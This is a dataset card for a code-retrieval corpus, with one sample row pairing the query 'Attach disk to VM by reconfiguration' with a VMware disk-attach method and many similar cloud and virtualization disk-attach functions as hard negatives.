Dataset columns:

    query            string (length 9 to 3.4k)
    document         string (length 9 to 87.4k)
    metadata         dict
    negatives        sequence (4 to 101 items)
    negative_scores  sequence (4 to 101 items)
    document_score   string (length 3 to 10)
    document_rank    string (102 distinct values)
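The columns describe a retrieval-style corpus: each row pairs a natural-language query with one positive document, a list of hard-negative documents, per-negative scores, and a score and rank for the positive. Below is a minimal sketch of loading and inspecting one row, assuming the data is published as a Hugging Face dataset; the repository id `org/dataset-name` is a placeholder, not the real path.

```python
from datasets import load_dataset  # assumes the Hugging Face `datasets` package

# "org/dataset-name" is a placeholder repo id; substitute the actual dataset path.
ds = load_dataset("org/dataset-name", split="train")

row = ds[0]
print(row["query"])                  # natural-language query (9 chars to 3.4k chars)
print(row["document"][:200])         # the positive passage, typically source code
print(len(row["negatives"]))         # 4 to 101 hard-negative passages
print(len(row["negative_scores"]))   # one score per negative
print(row["document_score"], row["document_rank"])
```

The rest of this section is one sample record from the corpus.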
query:

Attach disk to VM by reconfiguration.
document:

```python
def attach_disk_to_vm(self, vm_ref, instance_name,
                      adapter_type, disk_type, vmdk_path=None,
                      disk_size=None, linked_clone=False,
                      controller_key=None, unit_number=None,
                      device_name=None):
    client_factory = self._session._get_vim().client.factory
    vmdk_attach_config_spec = vm_util.get_vmdk_attach_config_spec(
        client_factory, adapter_type, disk_type, vmdk_path, disk_size,
        linked_clone, controller_key, unit_number, device_name)
    LOG.debug(_("Reconfiguring VM instance %(instance_name)s to attach "
                "disk %(vmdk_path)s or device %(device_name)s with type "
                "%(disk_type)s") % locals())
    reconfig_task = self._session._call_method(
        self._session._get_vim(),
        "ReconfigVM_Task", vm_ref,
        spec=vmdk_attach_config_spec)
    self._session._wait_for_task(instance_name, reconfig_task)
    LOG.debug(_("Reconfigured VM instance %(instance_name)s to attach "
                "disk %(vmdk_path)s or device %(device_name)s with type "
                "%(disk_type)s") % locals())
```
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def AttachDisk(self, disk: 'AZComputeDisk') -> None:\n vm = self.compute_client.virtual_machines.get(\n self.resource_group_name, self.name)\n data_disks = vm.storage_profile.data_disks\n # ID to assign to the data disk to attach\n lun = 0 if len(data_disks) == 0 else len(data_disks) + 1\n\n update_data = {\n 'lun': lun,\n 'name': disk.name,\n 'create_option': models.DiskCreateOption.attach,\n 'managed_disk': {'id': disk.resource_id}\n }\n\n data_disks.append(update_data)\n\n try:\n request = self.compute_client.virtual_machines.begin_update(\n self.resource_group_name, self.name, vm)\n while not request.done():\n sleep(5) # Wait 5 seconds before checking vm status again\n except azure_exceptions.CloudError as exception:\n raise RuntimeError(\n 'Could not attach disk {0:s} to instance {1:s}: {2:s}'.format(\n disk.name, self.name, str(exception))) from exception", "def _AttachDisk(self, idx, params, _):\n uuid = params.get(\"uuid\", None)\n name = params.get(constants.IDISK_NAME, None)\n\n disk = self.GenericGetDiskInfo(uuid, name)\n\n # Rename disk before attaching (if disk is filebased)\n if disk.dev_type in constants.DTS_INSTANCE_DEPENDENT_PATH:\n # Add disk size/mode, else GenerateDiskTemplate will not work.\n params[constants.IDISK_SIZE] = disk.size\n params[constants.IDISK_MODE] = str(disk.mode)\n dummy_disk = self._GenerateDiskTemplateWrapper(idx, disk.dev_type, params)\n new_logical_id = dummy_disk.logical_id\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(disk, new_logical_id)])\n result.Raise(\"Failed before attach\")\n self.cfg.SetDiskLogicalID(disk.uuid, new_logical_id)\n disk.logical_id = new_logical_id\n\n # Attach disk to instance\n self.cfg.AttachInstanceDisk(self.instance.uuid, disk.uuid, idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n changes = [\n (\"disk/%d\" % idx,\n \"attach:size=%s,mode=%s\" % (disk.size, disk.mode)),\n ]\n\n disks_ok, _, payloads = AssembleInstanceDisks(self, self.instance,\n disks=[disk])\n if not disks_ok:\n changes.append((\"disk/%d\" % idx, \"assemble:failed\"))\n return disk, changes\n\n if self.op.hotplug:\n _, link_name, uri = payloads[0]\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_DISK,\n disk, (link_name, uri), idx)\n changes.append((\"disk/%d\" % idx, msg))\n\n return (disk, changes)", "def attachDiskToMinipad(self , disk):\n return", "def attach_disk(self, instance, disk, zone):\n return self.call_api(\n '/zones/%s/instances/%s/attachDisk' % (zone, instance),\n method='POST',\n payload={\n 'autoDelete': True,\n 'deviceName': disk,\n 'source': 'projects/%s/zones/%s/disks/%s' % (\n self.project_id, zone, disk),\n },\n )", "def add_disk(self, vm, size, disk_type='thin'):\n logger.info(f\"Adding disk to {vm.config.name}\")\n spec = vim.vm.ConfigSpec()\n controller = self.get_controller_for_adding_disk(vm)\n unit_number = self.get_unit_number(vm)\n logger.info(f\"Unit number for new disk: {unit_number}\")\n\n device_changes = []\n new_disk_kb = int(size) * GB2KB\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.fileOperation = \"create\"\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add\n disk_spec.device = vim.vm.device.VirtualDisk()\n disk_spec.device.backing = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()\n if disk_type == VM_DISK_TYPE:\n disk_spec.device.backing.thinProvisioned = True\n disk_spec.device.backing.diskMode = VM_DISK_MODE\n disk_spec.device.unitNumber = 
unit_number\n disk_spec.device.capacityInKB = new_disk_kb\n disk_spec.device.controllerKey = controller.key\n device_changes.append(disk_spec)\n spec.deviceChange = device_changes\n WaitForTask(vm.ReconfigVM_Task(spec=spec))\n logger.info(f\"{size}GB disk added successfully to {vm.config.name}\")", "def disk(self, disk):\n self._context[\"disk\"] = disk", "def disk_config(self, disk_config):\n\n self._disk_config = disk_config", "def detachDiskFromMinipad(self , disk):\n return", "def create_disk(self, disk):\n spec = {\n 'new_vmdk': {\n # Convert from mebibytes to bytes because VMDK is specified in bytes\n 'capacity': 1024\n * 1024\n * disk.size,\n }\n }\n\n try:\n backend_id = self.client.create_disk(disk.vm.backend_id, spec)\n except VMwareError as e:\n raise VMwareBackendError(e)\n else:\n disk.backend_id = backend_id\n disk.save(update_fields=['backend_id'])\n signals.vm_updated.send(self.__class__, vm=disk.vm)\n return disk", "def set_virtual_disk_storage_profile(vm, hardware_device, profile):\n\n spec = vim.vm.ConfigSpec()\n device_specs = []\n profile_specs = []\n profile_spec = vim.vm.DefinedProfileSpec()\n profile_spec.profileId = profile.profileId.uniqueId\n profile_specs.append(profile_spec)\n\n device_spec = vim.vm.device.VirtualDeviceSpec()\n device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit\n device_spec.device = hardware_device\n device_spec.profile = profile_specs\n device_specs.append(device_spec)\n spec.deviceChange = device_specs\n vm.ReconfigVM_Task(spec)", "def attachDisk(\n positive, alias, vm_name, active=True, read_only=False, disk_id=None,\n interface='virtio', bootable=None,\n):\n if disk_id:\n name = disk_id\n attribute = 'id'\n else:\n name = alias\n attribute = 'name'\n disk_object = get_disk_obj(name, attribute)\n # This is only needed because for legacy reason we also want to modify\n # the read_only property when we attach a disk\n # Also for attaching a disk the active parameter is pass inside the disk\n # object\n updated_disk = _prepareDiskObject(\n id=disk_object.get_id(), read_only=read_only\n )\n vm_disks = getObjDisks(vm_name)\n logger.info(\"Attaching disk %s to vm %s\", alias, vm_name)\n disk_attachment = prepare_disk_attachment_object(\n updated_disk.get_id(), interface=interface, bootable=bootable,\n disk=updated_disk, active=active\n )\n return DISK_ATTACHMENTS_API.create(\n disk_attachment, positive, collection=vm_disks\n )[1]", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):", "def add_vm_with_disk(request, storage):\n self = request.node.cls\n\n def finalizer():\n assert ll_vms.safely_remove_vms(\n [self.test_vm_name]\n ), \"Unable to remove VM %s\" % self.test_vm_name\n\n request.addfinalizer(finalizer)\n self.vm_names = list()\n self.test_vm_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_VM\n )\n vm_args = config.create_vm_args.copy()\n vm_args['vmName'] = self.test_vm_name\n vm_args['storageDomainName'] = self.storage_domain\n\n testflow.setup(\"Creating VM %s\", self.test_vm_name)\n assert storage_helpers.create_vm_or_clone(**vm_args), (\n \"Failed to create VM %s\" % self.test_vm_name\n )\n self.vm_names.append(self.test_vm_name)\n\n testflow.setup(\n \"Attaching disk %s to VM %s\", self.disk_name, self.test_vm_name\n )\n assert ll_disks.attachDisk(True, self.disk_name, self.test_vm_name), (\n \"Failed to attach disk %s to VM %s\" %\n (self.disk_name, self.test_vm_name)\n )\n assert 
ll_disks.wait_for_disks_status(self.disk_name), (\n \"Disk %s is not in the expected state 'OK\" % self.disk_name\n )", "def attach_volume(self, instance_name, device_path, mountpoint):\n return True", "def test_06_migrate_vm_live_attach_disk(self):\n \n global vm\n global data_disk_1\n data_disk_1 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_1.id)\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n data_disk_1\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n self.volume\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)", "def attach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables from global.ini for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch mount options from global.ini\n try:\n mount_options = connectionData[\"mountoptions\"]\n except:\n mount_options = \"\"\n\n # fetch fencing options from global.ini\n try:\n fencing = connectionData[\"fencing\"]\n except:\n fencing = \"\"\n\n # fetch the host which currently owns the disk & the file path\n pdhost = self.get_pd_host(conn, pd, zone)\n path = storage.get(\"path\")\n\n # check if the require disk is already attached somewhere. 
If it is, detach it and fence the old host\n if pdhost == HOSTNAME:\n self.tracer.info(\"disk %s is already attached to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n continue\n elif pdhost != \"\":\n self.tracer.info(\"unable to attach %s to %s(%s) as it is still attached to %s\" % (pd, HOSTNAME, zone, pdhost))\n self.detach_pd(conn, pdhost, pd)\n if fencing.lower() == \"enabled\" or fencing.lower() == \"true\" or fencing.lower() == \"yes\":\n self.fence(conn, pdhost)\n\n # prepare payload for API call\n pdurl = self.zonal_url(zone, \"disks\", pd)\n body = {\n \"deviceName\": pd,\n \"source\": pdurl\n }\n\n # send API call to disconnect disks\n self.tracer.info(\"attempting to attach %s to %s(%s)\" % (pd, HOSTNAME, zone))\n operation = conn.instances().attachDisk(project=PROJECT, zone=zone, instance=HOSTNAME, body=body).execute()\n self.wait_for_operation(conn, operation, zone)\n\n # check if disk is attached and if so, mount the volumes\n if self.get_pd_host(conn, pd, zone) == HOSTNAME:\n self.tracer.info(\"successfully attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n else:\n raise Exception(\"failed to attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n\n # tell HANA is all good and to continue the load process\n return 0", "def do_install_disk(cls, disk, disk_name, creator, workdir, oe_builddir,\n bootimg_dir, kernel_dir, native_sysroot):\n logger.debug(\"SourcePlugin: do_install_disk: disk: %s\", disk_name)", "def disk_detach(vmdk_path, vm):\n\n device = findDeviceByPath(vmdk_path, vm)\n\n if not device:\n # Could happen if the disk attached to a different VM - attach fails\n # and docker will insist to sending \"unmount/detach\" which also fails.\n msg = \"*** Detach failed: disk={0} not found. 
VM={1}\".format(\n vmdk_path, vm.config.uuid)\n logging.warning(msg)\n return err(msg)\n\n spec = vim.vm.ConfigSpec()\n dev_changes = []\n\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove\n disk_spec.device = device\n dev_changes.append(disk_spec)\n spec.deviceChange = dev_changes\n\n try:\n wait_for_tasks(si, [vm.ReconfigVM_Task(spec=spec)])\n except vim.fault.GenericVmConfigFault as ex:\n for f in ex.faultMessage:\n logging.warning(f.message)\n return err(\"Failed to detach \" + vmdk_path)\n\n setStatusDetached(vmdk_path)\n logging.info(\"Disk detached %s\", vmdk_path)\n return None", "def detach_disk_from_vm(self, vm_ref, instance_name, device):\n client_factory = self._session._get_vim().client.factory\n vmdk_detach_config_spec = vm_util.get_vmdk_detach_config_spec(\n client_factory, device)\n disk_key = device.key\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_detach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())", "def setDisk(self, disk):\n self.__disk = disk", "def attach(self, node, device=None):\r\n\r\n return self.driver.attach_volume(node=node, volume=self, device=device)", "def _flash_dev(disk: pathlib.Path, image_path: pathlib.Path) -> None:\n shutil.copy(image_path, disk, follow_symlinks=False)\n if not platform.system() == \"Windows\":\n os.sync()", "def connect_disk(self, instance, disk_info, stg_ftsk=None):\n raise NotImplementedError()", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):\n data = connection_info['data']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n luns = [i.lun for i in data_disks]\n new_lun = 1\n # azure allow upto 16 extra datadisk, 1 os disk + 1 ephemeral disk\n # ephemeral disk will always be sdb for linux.\n for i in range(1, 16):\n if i not in luns:\n new_lun = i\n break\n else:\n msg = 'Can not attach volume, exist volume amount upto 16.'\n LOG.error(msg)\n raise nova_ex.NovaException(msg)\n disk = self.disks.get(CONF.azure.resource_group, data['disk_name'])\n managed_disk = dict(id=disk.id)\n data_disk = dict(lun=new_lun,\n name=data['disk_name'],\n managed_disk=managed_disk,\n create_option='attach')\n data_disks.append(data_disk)\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Attach Volume to Instance in Azure finish\"),\n instance=instance)", "def attach_volume(self, host_path: str, container_path: str, mode: str = None):\n self.volumes[host_path] = {\n \"bind\": container_path,\n \"mode\": mode or \"Z\"\n }", "def reconfigure_nova_ephemeral_disk(self):\n self.check_run('reconfigure_nova_ephemeral_disk')\n self.show_step(1, initialize=True)\n self.env.revert_snapshot(\"reconfigure_overcommit_ratio\")\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n computes = self.fuel_web.get_nailgun_cluster_nodes_by_roles(\n cluster_id, ['compute'])\n\n self.show_step(2)\n existing_configs = self.fuel_web.client.list_configuration(\n cluster_id)\n for existing_config in existing_configs:\n self.fuel_web.client.delete_configuration(existing_config[\"id\"])\n\n self.show_step(3)\n config = utils.get_config_template('nova_disk')\n 
structured_config = get_structured_config_dict(config)\n self.fuel_web.client.upload_configuration(config,\n cluster_id,\n role='compute')\n\n service_name = \"nova-compute\"\n\n uptimes = self.get_service_uptime(computes, service_name)\n\n self.show_step(4)\n task = self.fuel_web.client.apply_configuration(cluster_id,\n role='compute')\n self.show_step(5)\n self.fuel_web.assert_task_success(task, timeout=900, interval=5)\n\n self.show_step(6)\n self.check_service_was_restarted(computes, uptimes, service_name)\n\n self.show_step(7)\n self.check_config_on_remote(computes, structured_config)\n\n os_conn = os_actions.OpenStackActions(\n self.fuel_web.get_public_vip(cluster_id))\n\n self.show_step(8)\n self.show_step(9)\n self.show_step(10)\n self.show_step(11)\n self.show_step(12)\n self.check_nova_ephemeral_disk(os_conn, cluster_id)\n\n self.env.make_snapshot(\"reconfigure_nova_ephemeral_disk\",\n is_make=True)", "def _setDisk(self, disk):\n log_method_call(self, self.name, old=getattr(self.disk, \"name\", None),\n new=getattr(disk, \"name\", None))\n self.parents = []\n if disk:\n self.parents.append(disk)", "def do_install_disk(cls, disk, disk_name, creator, workdir, oe_builddir,\n bootimg_dir, kernel_dir, native_sysroot):\n if not cls.__imgBiosObj:\n cls.__instanciateBIOSClass()\n\n cls.__imgBiosObj.do_install_disk(disk, disk_name, creator, workdir,\n oe_builddir, bootimg_dir, kernel_dir,\n native_sysroot)", "def attach_volume(self, connection_info, instance, mountpoint):\n instance_name = instance['name']\n vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name)\n if vm_ref is None:\n raise exception.InstanceNotFound(instance_id=instance_name)\n # Attach Volume to VM\n LOG.debug(_(\"Attach_volume: %(connection_info)s, %(instance_name)s, \"\n \"%(mountpoint)s\") % locals())\n driver_type = connection_info['driver_volume_type']\n if driver_type not in ['iscsi']:\n raise exception.VolumeDriverNotFound(driver_type=driver_type)\n data = connection_info['data']\n mount_unit = volume_util.mountpoint_to_number(mountpoint)\n\n # Discover iSCSI Target\n device_name, uuid = self.discover_st(data)\n if device_name is None:\n raise volume_util.StorageError(_(\"Unable to find iSCSI Target\"))\n\n # Get the vmdk file name that the VM is pointing to\n hardware_devices = self._session._call_method(vim_util,\n \"get_dynamic_property\", vm_ref,\n \"VirtualMachine\", \"config.hardware.device\")\n vmdk_file_path, controller_key, adapter_type, disk_type, unit_number \\\n = vm_util.get_vmdk_path_and_adapter_type(hardware_devices)\n # Figure out the correct unit number\n if unit_number < mount_unit:\n unit_number = mount_unit\n else:\n unit_number = unit_number + 1\n self.attach_disk_to_vm(vm_ref, instance_name,\n adapter_type, disk_type=\"rdmp\",\n controller_key=controller_key,\n unit_number=unit_number,\n device_name=device_name)\n LOG.info(_(\"Mountpoint %(mountpoint)s attached to \"\n \"instance %(instance_name)s\") % locals())", "def createVM(self ,disk ,name):\n return", "def update_volume_after_attached_to_vm(self, info, vms):\n path = info[0]['path']\n path_list = path.split(sep='/')\n machine_path_list = [\"~\", \"Home\"]\n machine_path_list.extend(path_list[3:])\n info[0]['machine_path'] = \"/\".join(machine_path_list)\n info[0]['AttachedToVm'] = vms\n info[0]['State'] = 'in-use'\n info[0]['time'] = datetime.datetime.now()\n return info", "def attach_volume(self):\n\n # Choose volume\n volume_id = self._choose_among_available_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation 
cancelled'\n return\n\n # Choose instance\n instance_id = self._choose_among_running_instances()\n\n # Cancel\n if not instance_id:\n print 'Operation cancelled'\n return\n\n # Attach the volume\n print '# Attaching volume \"%s\"!' % volume_id\n if self.compute.attach_volume(volume_id, instance_id):\n print 'The volume has been attached!'\n else:\n print 'The volume could not been attached'", "def add_disk_for_rhv_platform():\n platform = config.ENV_DATA.get(\"platform\").lower()\n if platform == constants.RHV_PLATFORM:\n # Importing here to avoid circular dependency\n from ocs_ci.deployment.rhv import RHVBASE\n\n rhv_base = RHVBASE()\n rhv_base.attach_disks(\n config.ENV_DATA.get(\"device_size\", defaults.DEVICE_SIZE),\n config.ENV_DATA.get(\"disk_format\", constants.RHV_DISK_FORMAT_RAW),\n config.ENV_DATA.get(\n \"disk_interface\", constants.RHV_DISK_INTERFACE_VIRTIO_SCSI\n ),\n config.ENV_DATA.get(\"sparse\"),\n config.ENV_DATA.get(\"pass_discard\"),\n )", "def disk_set(vm_hostname, size):\n with ExitStack() as es:\n vm = es.enter_context(_get_vm(vm_hostname))\n\n current_size_gib = vm.dataset_obj['disk_size_gib']\n if size.startswith('+'):\n new_size_gib = current_size_gib + parse_size(size[1:], 'g')\n elif size.startswith('-'):\n new_size_gib = current_size_gib - parse_size(size[1:], 'g')\n else:\n new_size_gib = parse_size(size, 'g')\n\n if new_size_gib == vm.dataset_obj['disk_size_gib']:\n raise Warning('Disk size is the same.')\n\n if vm.dataset_obj['datacenter_type'] == 'aws.dct':\n vm.aws_disk_set(new_size_gib)\n elif vm.dataset_obj['datacenter_type'] == 'kvm.dct':\n _check_defined(vm)\n\n vm.hypervisor.vm_set_disk_size_gib(vm, new_size_gib)\n\n else:\n raise NotImplementedError(\n 'This operation is not yet supported for {}'.format(\n vm.dataset_obj['datacenter_type'])\n )\n\n vm.dataset_obj['disk_size_gib'] = new_size_gib\n vm.dataset_obj.commit()", "def add_disk(self, disk_type, device_type, disk, qemu_type=\"raw\"):\n\t\txml_type = \"%s_%s\" % (disk_type, device_type)\n\t\tif device_type in self.disk_ids:\n\t\t\tself.disk_ids[device_type] += 1\n\t\telse:\n\t\t\tself.disk_ids[device_type] = ord('a')\n\n\t\tf = os.path.join(self.config_dir, \"%s-%s-%s\" % (\n\t\t\tdisk_type, device_type, LibvirtFile.TEMPLATE_FILE))\n\t\tif not os.path.exists(f):\n\t\t\tcziso.abort(\"Unable to find libvirt file %s\" % f)\n\n\t\tvalues = {\n\t\t\t'id': chr(self.disk_ids[device_type]),\n\t\t\txml_type: os.path.realpath(disk),\n\t\t\t'qemu_type': qemu_type\n\t\t}\n\t\tself.disk_xmls.append(cziso.fill_template(f, **values))", "def test_11_migrate_vm_live_attach_disk_on_remote(self):\n \n global vm2\n global data_disk_2\n data_disk_2 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_2.id)\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n data_disk_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)\n\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n self.volume_2\n )\n\n destinationHost, vol_list = 
self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)", "def create(self, spec, force_cache):\n\n instance_id = self.get_instance_id(spec)\n instance_dir = os.path.join(self.directory, instance_id)\n # create the directory to hold all the bits\n logger.info(\"Creating directory %s\" % (instance_dir, ))\n os.mkdir(instance_dir)\n\n logger.info(\"Creating virtual machine\")\n self.vboxmanage(\"createvm\", name=instance_id, directory=self.directory, ostype=self.ostype[spec.image.distro])\n self.vboxmanage(\"configurevm\", name=instance_id, memsize=spec.hardware.memory)\n network = self.guess_network()\n network.configurevm(instance_id)\n\n logger.info(\"Creating disk image from %s\" % (spec.image, ))\n # create the disk image and attach it\n disk = os.path.join(instance_dir, instance_id + \"_disk1.vdi\")\n self.qemu_img(\"convert\", source=spec.image.fetch(self.image_dir, force_cache), destination=disk, format=\"vdi\")\n self.vboxmanage(\"create_sata\", name=instance_id)\n self.vboxmanage(\"attach_disk\", name=instance_id, disk=disk)\n\n # create the seed ISO\n logger.info(\"Creating cloudinit seed\")\n config_class = self.configs[spec.image.distro]\n cloud_config = config_class(spec)\n meta_data = MetaData(spec.name)\n seed = Seed(instance_dir, cloud_config=cloud_config, meta_data=meta_data)\n seed.write()\n\n logger.info(\"Attaching devices\")\n # connect the seed ISO and the tools ISO\n self.vboxmanage(\"create_ide\", name=instance_id)\n self.vboxmanage(\"attach_ide\", name=instance_id, port=\"0\", device=\"0\", filename=seed.pathname)\n self.vboxmanage(\"attach_ide\", name=instance_id, port=\"0\", device=\"1\", filename=\"/usr/share/virtualbox/VBoxGuestAdditions.iso\")\n logger.info(\"Machine created\")\n\n logger.info(\"Mounting host drive\")\n hostpath = os.path.expanduser(\"~\")\n self.vboxmanage(\"mount\", name=instance_id, hostpath=hostpath)\n return self.load(instance_id)", "def loopattach(diskimg):\n result = subprocess.run(['losetup', '--find', diskimg], check=True)\n return loopdev(diskimg)", "def attach_volume(\n self,\n volume: Union[dto.Volume, str],\n machine: Union[dto.Machine, str]\n ) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def vm_diskadd(args):\n name = args.name\n size = args.size\n template = args.template\n pool = args.pool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if size is None:\n common.pprint(\"Missing size. Leaving...\", color='red')\n os._exit(1)\n if pool is None:\n common.pprint(\"Missing pool. Leaving...\", color='red')\n os._exit(1)\n if name is None:\n common.pprint(\"Missing name. 
Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding disk to %s...\" % name)\n k.add_disk(name=name, size=size, pool=pool, template=template)", "def import_disk(\n self,\n backend_vm_id,\n backend_disk_id,\n save=True,\n project=None,\n ):\n try:\n backend_disk = self.client.get_disk(backend_vm_id, backend_disk_id)\n except VMwareError as e:\n raise VMwareBackendError(e)\n\n disk = self._backend_disk_to_disk(backend_disk, backend_disk_id)\n disk.service_settings = self.settings\n disk.project = project\n if save:\n disk.save()\n\n return disk", "def mount_root_vm(self):\n print \"montage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"mount /dev/%s/root-%s %s\" % (vgname, name_vm_dest, self.rep_vhosts_vm))", "def create(self, disk):\n logging.info('Adding type %d partition to disk image: %s' % (self.type, disk.filename))\n run_cmd('parted', '--script', '--', disk.filename, 'mkpart', 'primary', self.parted_fstype(), self.begin, self.end)", "def attach(self, instance_id, device):\r\n return self.connection.attach_volume(self.id, instance_id, device)", "def prepare_disks_for_vm(\n vm_name, disks_to_prepare, read_only=False, interfaces=list()\n):\n is_ro = 'Read Only' if read_only else 'Read Write'\n if not interfaces:\n interfaces = [config.VIRTIO] * len(disks_to_prepare)\n\n def attach_and_activate(disk, interface):\n logger.info(\n \"Attaching disk %s as %s disk to vm %s\", disk, is_ro, vm_name\n )\n assert ll_disks.attachDisk(\n positive=True, alias=disk, vm_name=vm_name, active=True,\n read_only=read_only, interface=interface\n ), \"Failed to attach disk %s to vm %s\" % (disk, vm_name)\n\n with ThreadPoolExecutor(max_workers=len(disks_to_prepare)) as executor:\n for disk, interface in zip(disks_to_prepare, interfaces):\n executor.submit(attach_and_activate, disk, interface)\n return True", "def _load_disk(self):\r\n pass", "def update_volume_after_detach(self, info, vms):\n info[0]['AttachedToVm'] = vms\n if len(vms) == 0:\n info[0]['machine_path'] = None\n info[0]['State'] = 'available'\n info[0]['time'] = datetime.datetime.now()\n return info", "def _do_attach(self, attach_device):\n try:\n if attach_device is not None:\n log.debug(\"Attaching volume '%s' to instance '%s' as device '%s'\" %\n (self.volume_id, self.app.cloud_interface.get_instance_id(),\n attach_device))\n self.volume.attach(\n self.app.cloud_interface.get_instance_id(), attach_device)\n else:\n log.error(\"Attaching volume '%s' to instance '%s' failed because \"\n \"could not determine device.\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id()))\n return False\n except EC2ResponseError, e:\n if e.error_code == 'InvalidVolume.ZoneMismatch':\n msg = (\"Volume '{0}' is located in the wrong availability zone \"\n \"for this instance. You MUST terminate this instance \"\n \"and start a new one in zone '{1}' instead of '{2}' \"\n \"to be able to use this volume.\"\n .format(self.volume_id, self.volume.zone,\n self.app.cloud_interface.get_zone()))\n self.app.msgs.critical(msg)\n log.error(msg)\n self.fs.state = service_states.ERROR\n else:\n log.error(\"Attaching volume '%s' to instance '%s' as device '%s' failed. 
\"\n \"Exception: %s (%s)\" % (self.volume_id,\n self.app.cloud_interface.get_instance_id(),\n attach_device, e.message,\n e.error_code))\n return False\n return self.status", "def create(self, directory):\n\n if not self.preallocated:\n if directory:\n self.filename = '%s/%s' % (directory, self.filename)\n logging.info('Creating disk image: %s' % self.filename)\n qemu_img_output = run_cmd(qemu_img_path(), 'create', '-f', 'raw', self.filename, '%dM' % self.size)\n if not os.path.exists(self.filename): \n logging.info(\"Problem while creating raw image: %s\" % qemu_img_output)\n raise Exception(\"Problem while creating raw image: %s\" % qemu_img_output)\n\n # From here, we assume that self.filename refers to whatever holds the disk image,\n # be it a file, a partition, logical volume, actual disk..\n\n logging.info('Adding partition table to disk image: %s' % self.filename)\n run_cmd('parted', '--script', self.filename, 'mklabel', 'msdos')\n\n # Partition the disk \n for part in self.partitions:\n part.create(self)\n\n logging.info('Creating loop devices corresponding to the created partitions')\n self.vm.add_clean_cb(lambda : self.unmap(ignore_fail=True))\n kpartx_output = run_cmd('kpartx', '-av', self.filename)\n parts = []\n for line in kpartx_output.split('\\n'):\n if line == \"\" or line.startswith(\"gpt:\") or line.startswith(\"dos:\"):\n continue\n if 